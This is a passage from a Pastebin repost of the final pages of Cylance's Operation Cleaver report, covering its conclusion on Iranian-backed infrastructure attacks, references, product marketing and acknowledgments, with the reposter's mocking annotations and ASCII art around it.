  2814. #%%%####(%%%@@@@(%(%(((((((((##%%%%%@@@@@@#******%&%%&&%&@@@@@@@@@@@@@@@@%%&@@@@@@@%%@%%@%%%%%%(%((
  2815. (%((%@##@@@%%((%%((((((((#####(&%%#@%#%%@@%%% (##@%%%%%%%&@@@@@@@@@@@@@@@@@@@@%@@@&&@%@@@@@@@@%%@((
  2816. (((((%%%@@%#((#%%%%@((((((%%#(#%%%%%%(((%,       .%%%%%%@@@@@@@@@@@@@@@@@@@@@@%@@@@@@@@@@@@@@@@@@@@
  2817. (((#((((%((%%%@@#@@@((((((@@%(%(%%%@@%%((         *@@@%&@@@@@@@@@@#@@@#%@@@@@@@@@@@@@@@@@@@@@@@@@@@
  2818. ##((#(###(@@@@@@@@@@@@#((@@%%%%%%%%%%%%((         ,@@#@@@@@@@@@@@@%@@@&%%#@@@@@@@@@@@@@@@@@@@@@@@@@
  2819. %%%%%%%%%%#@@@%@@%@@@#(%%%(##%%#(##%%((((         ,@&@@@@@@@@@@@@@@@&&@%@@@@%%@@@@@@@@@@@@@@@@@@@@&
  2820. @@@@@@@@@@@&@@@@@%%&@%@(((%%%%%%((((((((%     ... ,@@@@@@@@@@@(#%%%%%%#%%%%%%@#@%%%%%((%@@@@@@@%%%%
  2821. @@@@@@@@@@@@@@@@@@#(@@@@@(%%%%%((((%%((((((      @@@@@&%&@@@#(#%%%%%%%%%%#@@@@#%%%%%%%%%%%%##@@@(%%
  2822. %@@&%@@%%%@@@@@@%@(((((@((((#((#(%%%%%%%%%(      @@@&%%%@@@@%%%%@@%%%%#&%%%@&%%%%%%%%%%%%%((%%%%%%%
  2823. //#(%%%%%@@@@%%(((((((((((((((((%(#%%%##(##..,,, @@@&%@@@%%@@@@@@@%%%%%%%%%%%%%%%%@%%%%%%%((%%@@@%@
  2824. /#((/#%#(%%@(((%(%%%%%((((((#(((%%%%#(((%//..*** @@@@@@@@@#%%@%%%%%%%%%%%%%%@#%%%%%%%((((((((((((((
  2825.  
  2826. [ PG-65 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  2827.  
  2828.  
  2829.  
  2830. [CYLANCE                                                                                  #OPCLEAVER]
  2831.  
  2832.  
  2833. CONCLUSION
  2834.  
  2835. After tracking the Operation Cleaver team for over two years, we’re led to the inexorable conclusion:
  2836. the government of Iran, and particularly the Islamic Revolutionary Guard Corps (IRGC), is backing
  2837. numerous groups and front entities to attack the world’s critical infrastructure.
  2838.  
  2839. As security experts in Critical Infrastructure and Key Resources (CIKR), Industrial Control Systems (ICS),
  2840. Supervisory Control and Data Acquisition (SCADA) systems, Building Management Systems (BMS),
  2841. embedded systems and fixed-function systems, we know how easy they are to hack. We have worked with
  2842. countless customers and vendors throughout the years to notify them of vulnerabilities, assist with
  2843. remediatation efforts, and help mitigate threats to their environments.
  2844.  
  2845. Unfortunately, many critical infrastructure organizations are unable to secure their complex
  2846. environments against modern attacks. They fall victim to the “glue flu”, a malaise of feeling stuck,
  2847. not wanting to change the status quo for fear they will find problems that they have no idea how to
  2848. prevent. This “security anaphylaxis” spells real disaster.
  2849.  
  2850. If Operation Cleaver doesn’t get the world to wake up to what is happening in the silent world of
  2851. cyber, then perhaps nothing will. Prevention is everything and we should never give up until it’s achieved.
  2852.  
  2853. Challenge your trusted advisors. Challenge your security vendors. Demand better technology and services
  2854. to detect, respond, but most importantly PREVENT not just contemporary attacks, but future exotic attacks
  2855. that have yet to be imagined. That is what truly disruptive and innovative technology is. Don’t settle
  2856. for anything less.
  2857.  
  2858. We hope that by exposing the Operation Cleaver team to the world, current global critical infrastructure
  2859. victims can be notified, and prevent future victimization from suffering the consequences of “status quo”
  2860. security. Unlike United Flight 811, perhaps we can prevent the next disaster.
  2861.  
  2862.  
  2863. DEFENDERS, NEVER GIVE UP!
  2864.  
  2865. [ PG-66 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  2866.  
  2867.  
  2868.  
  2869. [CYLANCE                                                                                  #OPCLEAVER]
  2870.  
  2871.  
  2872. REFERENCES
  2873.  
  2874. [1] Aboard Flight 811: Passengers’ Routine Dissolves Into Terror - February 1989
  2875. http://www.nytimes.com/1989/02/26/us/aboard-flight-811-passengers-routine-dissolves-into-terror.html
  2876.  
  2877. [2] “Forget China: Iran’s Hackers Are American’s Newest Cyber Threat” - February 2014
  2878. http://complex.foreignpolicy.com/posts/2014/02/18/forget_china_iran_s_hackers_are_america_s_newest_cyber_threat
  2879.  
  2880. [3] “Developments in Iranian Cyber Warfare 2013-2014” - August 2014
  2881. http://www.inss.org.il/uploadImages/systemFiles/SiboniKronenfeld.pdf
  2882.  
  2883. [4] “Iran ups cyber attacks on Israeli computers: Netanyahu” - June 2013
  2884. http://uk.reuters.com/article/2013/06/09/us-israel-iran-cyber-idUKBRE95808H20130609
  2885.  
  2886. [5] “Iranians hacked Navy network for four months? Not a surprise.” - February 2014
  2887. http://arstechnica.com/information-technology/2014/02/iranians-hacked-navy-network-for-4-months-not-a-surprise/
  2888.  
  2889. [6] “Iran and North Korea Sign Technology Treaty to Combat Hostile Malware” - September 2012
  2890. http://www.v3.co.uk/v3-uk/news/2202493/iran-and-north-korea-sign-technology-treaty-to-combat-hostile-malware#
  2891.  
  2892. [7] “Iran’s Paramilitary Militia Is Recruiting Hackers” - January 2011
  2893. http://www.forbes.com/sites/jeffreycarr/2011/01/12/irans-paramilitary-militia-is-recruiting-hackers/
  2894.  
  2895. [8] “The Iranian Nuclear Weapon” - January 2014
  2896. http://webcache.googleusercontent.com/search?q=cache:eJbMz7vynpQJ:iranredline.org/index.
  2897. php%3Fid%3D22+&cd=1&hl=en&ct=clnk&gl=us
  2898.  
  2899. [9] “HPSR Threat Intelligence Briefing Episode 11, February 2014” - February 2014
  2900. http://www8.hp.com/h20195/v2/getpdf.aspx/4AA5-1589ENW.pdf?ver=1.0
  2901.  
  2902. [10] “Intel boss’ warning on cyber attacks no joke, say experts” - November 2014
  2903. http://www.foxnews.com/world/2014/11/23/intel-boss-warning-on-cyber-attacks-no-joke-say-experts/
  2904.  
  2905. [11] “Khamenei controls massive financial empire built on property seizures” - November 2013
  2906. http://www.reuters.com/investigates/iran/#article/part1
  2907.  
  2908. [12] “Treasury Targets Assets of Iranian Leadership” - June 2013
  2909. http://www.treasury.gov/press-center/press-releases/Pages/jl1968.aspx
  2910.  
  2911. [13] “Internet Censorship in Iran”
  2912. http://en.wikipedia.org/wiki/Internet_censorship_in_Iran
  2913.  
  2914. [14] “Iranian Internet - Fact and Faction”
  2915. http://surveillance.rsf.org/en/iran/
  2916.  
  2917. [15] “Iran readying hacker attacks on U.S. infrastructure, specialists say” - April 2012
  2918. http://www.washingtontimes.com/news/2012/apr/25/iran-readying-hacker-attacks-us-infrastructure-spe/?page=all
  2919.  
  2920. [ PG-67 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  2921.  
  2922.  
  2923.  
  2924. [CYLANCE                                                                                  #OPCLEAVER]
  2925.  
  2926. ABOUT CYLANCE
  2927.  
  2928. In the face of growing and evolving threats, traditional cyber protection technologies are now widely
  2929. considered inadequate. The only way to regain the upper hand against a new generation of attackers, is
  2930. to embrace something entirely new. Something that “thinks” like an attacker. Something that doesn’t
  2931. rely on a trust model or care about hash lookups. Something with a brain.
  2932.  
  2933. “The world has combated cyber threats by doing the same thing over and over again ... it’s the definition
  2934. of insanity!” Jeff Moss - Co-Chair of the DHS Community Resiliency Task Force & Founder of BlackHat and
  2935. DEFCON security conferences
  2936.  
  2937.  
  2938. Cylance has eschewed the old foundations that existing cybersecurity products are built upon. Instead,
  2939. we’ve based our approach on mathematics, machine learning, and data science. This algorithmic approach
  2940. has been proven to detect – and stop – exponentially more modern threats.
  2941.  
  2942. Leveraging algorithmic risk modeling, CylancePROTECT protects endpoints from everyday viruses, worms,
  2943. trojans, and spyware, but unlike other security products, CylancePROTECT offers true future-proof
  2944. protection against the most malicious threats in the world. Advanced Persistent Threats (APT), 0-days,
  2945. and exotic exploitation techniques are easily detected and halted with little-to-no impact on the end-user.
  2946.  
  2947. Existing reactive solutions rely on a constant stream of signature updates for threat detection,
  2948. which is not only costly and inconvenient, but also requires “sacrificial lambs”. Only after a
  2949. previously unseen threat has inflicted damage can the rest of the industry begin to detect it.
  2950. CylancePROTECT doesn’t require constant updates or even a network connection to protect against
  2951. so-called “previously undetectable” threats. By identifying and defusing attacks in near real time,
  2952. before the attack can execute, we can finally do away with the need for a “patient zero”.
  2953.  
  2954. As Richard Stiennon, Chief Research Analyst at IT-Harvest, put it, “Many vendors are trying to
  2955. solve the endpoint problem, yet Cylance is the only one using the power of math to stop malware
  2956. and with more effectiveness and efficiency than current solutions”.
  2957.  
  2958. Interested in seeing what CylancePROTECT can do for your organization? Contact us!
  2959.  
  2960. Cylance is one of the fastest growing cybersecurity technology firms in the US. Cylance’s flagship
  2961. product CylancePROTECT has been adopted by Fortune 500 companies and government agencies across the
  2962. globe. Cylance was founded by 27-year security industry luminary, Stuart McClure, former Global CTO
  2963. of McAfee, original founder of Foundstone, and lead author of the international best-selling book
  2964. Hacking Exposed. In building Cylance, Stuart brought together the best scientific and executive
  2965. minds from the likes of Cisco, Sourcefire, Google and McAfee. The Cylance board of advisors includes
  2966. former high-ranking officials from the DHS, the FBI, CIA, and executive titans of business.
  2967.  
  2968. [ PG-68 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  2969.  
  2970.  
  2971.  
  2972. [CYLANCE                                                                                  #OPCLEAVER]
  2973.  
  2974.  
  2975. CYLANCE PRODUCTS
  2976.  
  2977. CylancePROTECT is the only next generation endpoint security product that applies math to mute
  2978. existing and future malware, viruses, worms, trojans, bots, APTs, 0-days, exploits, adware, spyware
  2979. and hacking tools – without needing any updates or even a connection to the Internet. The technology
  2980. is founded on the principle that to fix the industry, you must start from scratch with a way as yet unseen.
  2981.  
  2982. CylancePROTECT does not rely on signatures of any sort (blacklist or whitelist), behavioral analysis
  2983. using IOCs, sandboxing analysis, heuristics, micro-virtualization, or dynamic detonation – to detect
  2984. and prevent malicious files from executing on a target endpoint.
  2985.  
  2986. While every other endpoint security product must collect a sample, analyze, and write a signature to
  2987. detect it, CylancePROTECT can detect malware before it executes by statically analyzing features
  2988. found in the binary itself.
  2989.  
  2990. Features and Benefits of CylancePROTECT:
  2991.  
  2992.  
  2993. *       Near real time detection of malicious files, even if they’ve never been seen in the wild.
  2994. *       Can be used to augment existing endpoint security or be deployed as a complete replacement.
  2995. *       Does not require any signature updates or connection to the cloud.
  2996. *       An easy-to-use web management console with intuitive workflows.
  2997. *       Low-impact endpoint agent.
  2998.  
  2999.  
  3000. For a demo of CylancePROTECT, contact a Cylance expert today!
  3001.  
  3002. [SHINY PRODUCTS!]
  3003.  
  3004. Figure 26: Cylance products detect and stop all the malware used in Operation Cleaver, even though the
  3005. vast majority of the samples are completely missed by the antivirus industry as of this report’s
  3006. publication.
  3007.  
  3008. [ PG-69 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  3009.  
  3010.  
  3011.  
  3012. [CYLANCE                                                                                  #OPCLEAVER]
  3013.  
  3014. CYLANCE SERVICES
  3015.  
  3016. Cylance’s Professional Services team is available to assist companies affected by this campaign.
  3017. Cylance is providing consulting to companies that may have been targeted by these advanced threat
  3018. actors. Cylance will perform initial triage in order to determine the extent to which your company
  3019. has been affected by this campaign and work towards establishing a containment strategy.
  3020.  
  3021. Cylance has two tailored offerings for clients affected by this campaign. The first one includes
  3022. ICS in our incident response since many companies affected are in the Critical Infrastructure and
  3023. Key Resources (CIKR) vertical. The second offering’s focus is to deploy our proprietary tools and
  3024. methodologies to detect and mitigate the threats posed by Operation Cleaver.
  3025.  
  3026. Option 1:  ICS Incident Response & APT Detection and Mitigation
  3027. Option 2: Detection, Remediation, & Mitigation
  3028.  
  3029.  
  3030. For more information on how the Cylance Professional Services team can assess and respond to attacks
  3031. like the ones obseved in Operation Cleaver, contact sales@cylance.com today.
  3032.  
  3033.  
  3034. [MARKETING!!!]
  3035.  
  3036. [ PG-70 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  3037.  
  3038.  
  3039.  
  3040. [CYLANCE                                                                                  #OPCLEAVER]
  3041.  
  3042.  
  3043. ACKNOWLEDGMENTS
  3044.  
  3045. Brian Wallace <- THIS DOOD ROCKS
  3046. Brian is a Sr. Security Researcher for Cylance who joined shortly after the company was established.
  3047. He is best known for his avid botnet research (often going by “botnet_hunter”) and for his novel malware
  3048. analysis in the A Study in Bots blog series hosted by Cylance. Brian has been a dedicated open-source
  3049. developer as well as an advocate for public and private anti-botnet operations. Brian actively develops
  3050. techniques to combat cyber oppositions in positions where resources and leverage are in too limited of
  3051. supply for conventional means. These techniques, cultivated by Stuart McClure, are the Art of Deterrence.
  3052. In a previous investigation, Art of Deterrence techniques were successfully used to divert Indonesian
  3053. hackers motivated by monetary gain away from their highest yielding target group.
  3054.  
  3055. Brian’s botnet research covers a wide range of topics, from using graph analysis to estimate the amount
  3056. of ransom that has been paid to a ransomware operator, to utilizing IPv4 scanning techniques to identify
  3057. and take down point of sale malware panels.
  3058.  
  3059. Stuart McClure <- <ALSO ROCKS, PRETTY SURE I MET HIM AT A PENTAGON AFCEA MEETING AND GOT A FREE BOOK
  3060. Stuart is founder, CEO/President and Chairman of Cylance. Widely recognized for his extensive and in-depth
  3061. knowledge of security products, Stuart McClure is considered one of the industry’s leading authorities
  3062. in information security today. A well-published and acclaimed security visionary with currently eleven
  3063. books in print, McClure is the originating founder of the Hacking Exposed series of books, the most
  3064. successful security book ever written. From his work, he founded Foundstone in October of 1999 which
  3065. sold to McAfee in 2004.
  3066.  
  3067. McClure brings over two decades of technology and executive leadership with profound technical, operational,
  3068. and financial experience. Besides Foundstone, Stuart held leadership positions at InfoWorld, Ernst & Young,
  3069. Kaiser Permanente and a number of government agencies. At McAfee, McClure held numerous positions including
  3070. SVP/General Manager for the Security Management BU as well as EVP/Global Chief Technology Officer responsible
  3071. for almost $3B worth of revenues. Today, McClure is CEO of Cylance, a disruptive and innovative startup
  3072. applying math to the problem of security. Cylance products such as CylancePROTECT prevent the most advanced
  3073. attacks in the world without signatures or sandboxing in realtime on the endpoint. Cylance Services offer
  3074. highly specialized security services such as incident response, forensics, compromise assessments and
  3075. advanced penetration assessments for global critical infrastructure.
  3076.  
  3077. Cylance Team
  3078. Cylance employees work passionately and tirelessly every day to achieve one goal: Protect the world from
  3079. cyber attacks. And with their efforts in tracking Operation Cleaver, they have achieved that goal. Our
  3080. endless thanks to all the Cylancers who contributed to this report.
  3081.  
  3082. [ PG-71 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  3083.  
  3084.  
  3085.  
  3086. For indicators of compromise GOTO  http://jjjjj.us/EJ
  3087.  
  3088.  
  3089.  
  3090.  
  3091. @@@@@@@@@@@@@@@@@@@@@@@@###@@@@(((@@@@@@@@@@@%%#@@@@@@@%###%##%&@@@@@@@@@@@@@@@@@@@@@@@@@%%%%%%%%%%
  3092. %#####%%#@@&%%@@@@#%%%%%%%%((%#&@@#%%@@@@@#%%%%@@@#@@@@@@@###%#@@@@@@/@&%%@@@@@@@@@@&@@@@@%#@@@%@@%
  3093. (%%%%#@@@@#%@@#%%%%%%%%%%%%(%%(/@@/@/#%/%((/#(@(@@.(,@((&@&(.%%%#@@@@@%@@@@@@@@@@@@@@%%(@@@####@@%%
  3094. #@@@@@@@@@/(((#%%%%%%%%%(%%%%%###%,%%,@%/(/#@/@.@@/*###,%(@/%*/(%@&@%@@@@@@@@@@@@@@%    %%%%%%%%%%%                                          
  3095. (%%%%#@@@@#%@@#%%%%%%%%%%%%(%%(/@@/@/#%/%((/#(@(@@.(,@((&@&(.%%%#@@@@@%@@@@@@@@@@@@@@%%(@@@####@@%%
  3096. #@@@@@@@@@/(((#%%%%%%%%%(%%%%%###%,%%,@%/(/#@/@.@@/*###,%(@/%*/(%@&@%@@@@@@@@@@@@@@%    %%%%%%%%%%%
  3097. @@@@@@@@@@@%%((&%%@#%#@@%&((,*(.%.%,#%%%%%/,,      .,(&%%#((#*.**(@#@@@@@@@@@@@@.        /########%
  3098. @#&(#&(###@###(///@&&(.%.&(%%#&,       .,**//**,.       .#######@@&@&&%             @@@@@&%@@
  3099. %%%%(%%%%%%%%&(((((((.%(( (.%%%.    *#%%%%%%%%%%%%%#%##*(((,    .#(%#(##(/                 @@@@%%#@
  3100. %%%%%%#####%/(#(((((.(.(,%%%    ,%%%%%%%%%#(*/*%%%###%###%%.,(#*    (&                     .&&&&&&&
  3101. (%%%%%%%%(((((%%%%,(((%   ,%%/%@@/#@@@(@@%%%##%%%##%%%%%%%%/%%##.                          %%%%%%
  3102. (((((((((%%#(((&%%%*%%%   ##//%#,.#@@&&@@@/#%%%%%%%%*#//**(         \                     ,%%%%@
  3103. #(#@(####((%((#@(%%%%   ##%%#(#//%&@%%#(/&@###*#%%%%%%%%#%#*         \ji                      .%%##
  3104. %%@@@@@(((((%%#%.@@.  #%%&@&/@&&&%%%%##*%#(*(%%%%%%%%%%%.            /.((                      *###
  3105. #(((((#%%%(##,@(%@  *@@#/((/*%/(%((&/(%##/#%%%%%%@@%&               (,/"(((__,--.               (##
  3106. (#%%%%%%%@,/&%&@(  @&@@@@&%%/#%#/%///@%%%%%%%%@@&(                      \  ) _( /{        ,//***/##
  3107. (####(#%%,.#%&@#  @@@@@@@&&@@&&#,&@&%%%%%#//%%%//                       !|| " :||               ///
  3108. ((((###(&((%*@/  %%%@@%%%%%%%/*/%%%%%%@@%%(/////////(                   !||   :||            ((((((
  3109. ##%%%%#@#*.(#/   %%%%%%&@%%%%/,,%%%%&@@@@@@@@(#@@@@(//                  '''   '''    ,#%%@%%&//%%%%
  3110. ######%@. ,#%   (%%%%%%%%,(&@@@@@&@@@@@@@@@@@/#@    @(%/                        ,  %%%%#((((//////%
  3111. %%%%%%(%.#,%(  (%%///%%#/%%&@@@#@/&@@@@#  /,  ,#    #%(#(                  *(&*#,. %###/(///(//////
  3112. %%%%%%%%  %%  *(%/%%#/%@@&@@&@@@@%@@@@%   /    ..((,../*/              ,((@@@%/%#/ .///%/%(/%%@@@@@
  3113. %%%%%%*%,@%%  ((#(###@@@@@@@&%/&@@@#  *   #   #.        .(         .#@@@%##@#%//  /%%/%/#%%&/@#%&
  3114. %%%%%%%%*%@#  %%%&@%@@@@%%%%&%&%&%%   (   %   (.   ,      (     (#&&%%%%%%%(*%#&/(  (////%%@@/((&@@
  3115. %%%%%%*.%*((  ##%%((@@######%&%%%   #   #    %   *(      / #%%%&@@@%%%%%%%%/####  *//@@@@@@//@@##
  3116. %%%%%%&&(/((  @@%%%#&@%#@@@@@@&   (   #   .*    .#     (@&%%@@@@@%%%%%%%%(%%%/  /%%%%@%@@%/###(
  3117. %%%%%%(&*(((  &@@@&%((((&@@@@@@@@,*   #  .%#((.  .#        &@@@@@@@@@@@%%%%%%%%%%%  %%%%%%%%%@/%@@@
  3118. %%%%@@/#@@*@  /@@@%@@#@@@@@@@@@  &@,        /         ,@@@@@@@@@@@@@%@@@/%%%%( .%%%%%%%%%%%%%%@
  3119. %%%@@@@, &@@(  &@@@@%@@@@@#(%&/(% (*          (.          (#/((@@@@@@@@%&&(%%%%. %#%%%%%%%@%%&@@@
  3120. %%@&@@@,@,@%@. ,@@@@%@@@@(((%&@#            .%          /#%%%%%%/&&&@@@@@@#(#&/  @(#%%%%#(#%%%%@@
  3121. %%%&%@@@,@&&@@  @@@@@#@@@&@@%            .%%%,        *# /#%#%##%(#@@@@@@@@%%,%%  (@##%%%%%%%#@
  3122. %%%%#@@@@**%/  @@@@%#@@@@@,          /.  *%       (/  #%%###%@@@(@@@@@@%(/(%(  ,%%%%%#%%%%%%%%%%%
  3123. %%%%%%%%%%%.%,@#  @@@@@&@@@@&       .(       #    (/   ###%%%##%%%@@@@&%/*/,/(  *%%#%#%%%%%@@%%%%%%
  3124. %%%&@@#@@%## (%%(  @@@@%@@@@@%   .(%    ###(,         %%%%%%%%%%%/%%%@%/*&&@&  ,%%%%#%%#%%%%%%%%@@%
  3125. %%%%%#@@%@@%,/@*%#  %@@@@%@@@@@@&@@@&%               %%%%%%%%%%%%%#%%%%(#%%/  ,%%%%%#@@@@@@@@@@@@@@
  3126. %@@&%%%%%%%%@@%,/((,  (##%#%&@@@@@@#(#              .%%%@%%%%%%%%%/#/%@@@%   %%%%%%@@@@@@@@@@@@@@@@
  3127. %##%%%%%%@@%#*#* (&%(   #%#*&@@@@@#@@@              .%%%%%#(((%%%%%####%   ###%%%%@@@@@&@@@@@@@@@@@
  3128. %%%%%%%%%@%(#@%@**(.(%%   (#((#**#@@@&              .#######/########(   *%%%@&%&&@@&@@@@&@@@@@@@@@
  3129. %%%%%%%%%###@@@@ .(.@#@@@   .#/(%@@@&&              .%####%########,   (%@#@#@@@@@%@@@%%@@@@@@@@@@@
  3130. #%%%%@@@@@@@@##((@,@*(,(/%%.   ,&/&%##              .###########,   .##&@%@@@@@@@%@@&@&@@@@@@&%%@@%
  3131. #@@@@@@@@@@(@@@@@@@%@.#,%.((%%#     ,(              .##%#%%*    .#%%%%%%#@@@%@@%@@@@@@@@@@@@@@@@@@@
  3132. @@@@@@((((((@@@@@@@@((#@/, (*(%%%%&.                         &%%%%%%%&@@%#@&@@@@@@@@&@@@@@@@@@@@@@@
  3133. @@@@@@%%@@(@@@@@@@(((%%%%%%%* %.%,%%%%               ##////%&/%&@@%@%@@%&%&@@@@&&&@&@@@@@@@@@@@@@@@
  3134. &@@(%@@@@@@@@@@@%@%%%%%((%%%%%/#,%%%%%              /////////@@@@@@@@@@@@@@@@@@@@@#%((@@@%@@@#@@@@@
  3135. ((((%#@@%@@%##@@#%((%(%((#/////////#&/         ./&%%&&&/@@@@@@@@@@@@@@@@@@@@&@@@@@@@@@@(%%#%%%%%%%%
  3136. (###%%%%%@@%@%%%#@@%###%#/////%//@@&(/     (   ./&%%%%&@@@@@@%&/@@((/@@@@@###%@%@@@@@#%@@@@@@#@@%%%
  3137. (%%%%%%%%%%%##@@@#%%%%&&&&&&@/@@@@@/@#.%&&(/   ,&/%%%%%%@@@@@///%%////(@%%%%%%%%@@@%%@@@@@@@@@@%%%%
  3138. #@@%%%%%%%%%%%%%%%@@@@@@@@@@@@@@@@@&%%%%%%%%   .%@//(////////////////////@&%@%@@/@###%%%%((((((%%((
  3139. %%%%%%%%%%%%%%%@@@@@@@@@@@@@@/@@@@#%%%%%%%%%   ,@@@@&%@@@%//%////%/%%%%/@#@@@@@/@//@@@/%%%%%(((((%@
  3140. %%%%%%%%%%(%@@@@#%#(#((((@@(%%%%%%%%%@#@@     (@@@@@@@%@#@&%%%@@@@@@@@%&@@@@@///@@@#%%%(#%%%(#%%%
  3141. #%%%####(%%%@@@@(%(%(((((((((##%%%%%@@@@@@#******%&%%&&%&@@@@@@@@@@@@@@@@%%&@@@@@@@%%@%%@%%%%%%(%((
  3142. (%((%@##@@@%%((%%((((((((#####(&%%#@%#%%@@%%% (##@%%%%%%%&@@@@@@@@@@@@@@@@@@@@%@@@&&@%@@@@@@@@%%@((
  3143. (((((%%%@@%#((#%%%%@((((((%%#(#%%%%%%(((%,       .%%%%%%@@@@@@@@@@@@@@@@@@@@@@%@@@@@@@@@@@@@@@@@@@@
  3144. (((#((((%((%%%@@#@@@((((((@@%(%(%%%@@%%((         *@@@%&@@@@@@@@@@#@@@#%@@@@@@@@@@@@@@@@@@@@@@@@@@@
  3145. ##((#(###(@@@@@@@@@@@@#((@@%%%%%%%%%%%%((         ,@@#@@@@@@@@@@@@%@@@&%%#@@@@@@@@@@@@@@@@@@@@@@@@@
  3146. %%%%%%%%%%#@@@%@@%@@@#(%%%(##%%#(##%%((((         ,@&@@@@@@@@@@@@@@@&&@%@@@@%%@@@@@@@@@@@@@@@@@@@@&
  3147. @@@@@@@@@@@&@@@@@%%&@%@(((%%%%%%((((((((%     ... ,@@@@@@@@@@@(#%%%%%%#%%%%%%@#@%%%%%((%@@@@@@@%%%%
  3148. @@@@@@@@@@@@@@@@@@#(@@@@@(%%%%%((((%%((((((      @@@@@&%&@@@#(#%%%%%%%%%%#@@@@#%%%%%%%%%%%%##@@@(%%
  3149. %@@&%@@%%%@@@@@@%@(((((@((((#((#(%%%%%%%%%(      @@@&%%%@@@@%%%%@@%%%%#&%%%@&%%%%%%%%%%%%%((%%%%%%%
  3150. //#(%%%%%@@@@%%(((((((((((((((((%(#%%%##(##..,,, @@@&%@@@%%@@@@@@@%%%%%%%%%%%%%%%%@%%%%%%%((%%@@@%@
  3151. /#((/#%#(%%@(((%(%%%%%((((((#(((%%%%#(((%//..*** @@@@@@@@@#%%@%%%%%%%%%%%%%%@#%%%%%%%((((((((((((((
RAW Paste Data
Pastebin PRO Summer Special!
Get 40% OFF on Pastebin PRO accounts!
Top